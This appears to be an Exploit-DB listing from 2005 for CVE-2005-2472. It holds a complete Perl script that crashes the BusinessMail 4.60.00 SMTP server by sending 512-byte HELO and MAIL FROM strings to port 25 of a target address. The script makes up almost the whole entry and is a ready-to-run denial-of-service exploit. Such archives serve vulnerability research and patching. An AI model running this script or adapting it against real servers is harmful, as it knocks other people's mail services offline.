BusinessMail <= 4.60.00 - Remote Buffer Overflow Exploit

2005-07-30T00:00:00
ID EDB-ID:1164
Type exploitdb
Reporter Reed Arvin
Modified 2005-07-30T00:00:00

Description

BusinessMail <= 4.60.00 Remote Buffer Overflow Exploit. CVE-2005-2472. Dos exploit for windows platform

                                        
                                            #===== Start BusMail_SMTPDOS.pl =====
#
# Usage: BusMail_SMTPDOS.pl &lt;ip&gt;
#        BusMail_SMTPDOS.pl 127.0.0.1
#
# BusinessMail email server system 4.60.00
#
# Download:
# http://www.netcplus.com/
#
##########################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET-&gt;new(PeerAddr =&gt; $ARGV[0],
                                    PeerPort =&gt; "25",
                                    Proto    =&gt; "TCP"))
{
        print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\n";

        sleep(1);

        print $socket "HELO " . "A" x 512 . "\r\n";

        sleep(1);

        print $socket "MAIL FROM:" . "A" x 512 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:25\n";
}
#===== Start BusMail_SMTPDOS.pl =====

# milw0rm.com [2005-07-30]